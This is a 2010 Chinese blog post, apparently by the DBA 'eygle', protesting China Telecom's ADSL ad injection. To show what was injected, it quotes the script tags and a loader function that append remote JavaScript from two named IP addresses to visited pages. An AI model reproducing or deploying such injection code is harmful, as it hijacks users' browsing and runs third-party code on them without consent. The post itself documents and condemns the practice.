eygle.com   eygle.com
eygle.com eygle
eygle.com  
 

« 没有什么是不可能的 - MSN Space即将关闭 | Blog首页 | 繁简总相宜 -《Oracle DBA手记》繁体版 »

还能更流氓么 - 电信ADSL植入广告可耻行为
modb.pro

前两天,用家里的电脑,没怎么注意,过一会就弹出一个广告页面,播放大中电器的广告,随手就关掉了。

可是今天,浏览我自己的 Eygle.com 居然也弹出广告,而且丫的估计网站有问题,还时灵时不灵的,你灵了还好,出不来吓得我一身冷害,是不是自己的网站被植入了木马?被黑了?

于是马上开始分析日志,查!
结果一无所获,还是分析被植入的广告页面吧。

主要代码段是这样的:
<script type="text/javascript" language="javascript" src="http://59.51.96.37/pagead/ads.js?umask=25&interval=1800&vask=1665782678&uid=400090109&pid=72902348125219489&o_url=www.eygle.com/&aname=00010730&ic=&vh=00010737,42|00010675,22|00010753,9|00012404,6|00010809,4|00010695,4|00010699,4|00010744,4&al=0&ipc_type=CTN&ipc_nid=3">
1function mf(){head=document.getElementsByTagName('body').item(0);script=document.createElement('script');script.src='http://60.190.105.7/10092511/images/asd.js';script.type='text/javascript';script.defer=true;void(head.appendChild(script));}mf();
</script>
<script src="http://60.190.105.7/10092511/images/asd.js" type="text/javascript" defer="">
这里涉及到两个ip地址:59.51.96.37 , 60.190.105.7, Google一下,发现这已经是臭名昭著的两个地址。
在多个省市都有报告。

据分析,可能这个广告植入技术是同一家公司开发的,跟SP群发小广告一个道理,依托运行商强制植入。
看到已经有 verycd / 豆瓣 等网站被植入,我这小网站放一马不行么? 靠!

这JS代码还写得有板有眼,还有注释,"需要修改前面地址目录",是不是忘了改?广告过期了不能正常显示了!

var DEFAULT_MSGICON = "";
//需要修改前面地址目录
var DEFAULT_MSGCONTENT = "http://60.190.105.7/10092511/asd.htm";
var DEFAULT_MSGTIME =3000;


垄断就想方设法的作恶,这就是中国!
强烈谴责电信的无耻行为,明天和要和电信斗争到底!
同病相怜的链接:
http://www.douban.com/online/10560055/
http://hi.baidu.com/rober/blog/item/c0d5751e323e9ffa1bd5762f.html





历史上的今天...
    >> 2018-09-29文章:
    >> 2017-09-29文章:
    >> 2011-09-29文章:
    >> 2009-09-29文章:
    >> 2007-09-29文章:
    >> 2006-09-29文章:
    >> 2005-09-29文章:

By eygle on 2010-09-29 23:40 | Comments (5) | Web | 2626 |

5 Comments

ff+noscript+abp让流氓广告去死

还有可恶对 DNS 劫持

跟网站广告差不多而已,呵呵


CopyRight © 2004~2020 云和恩墨,成就未来!, All rights reserved.
数据恢复·紧急救援·性能优化 云和恩墨 24x7 热线电话:400-600-8755 业务咨询:010-59007017-7040 or 7037 业务合作: marketing@enmotech.com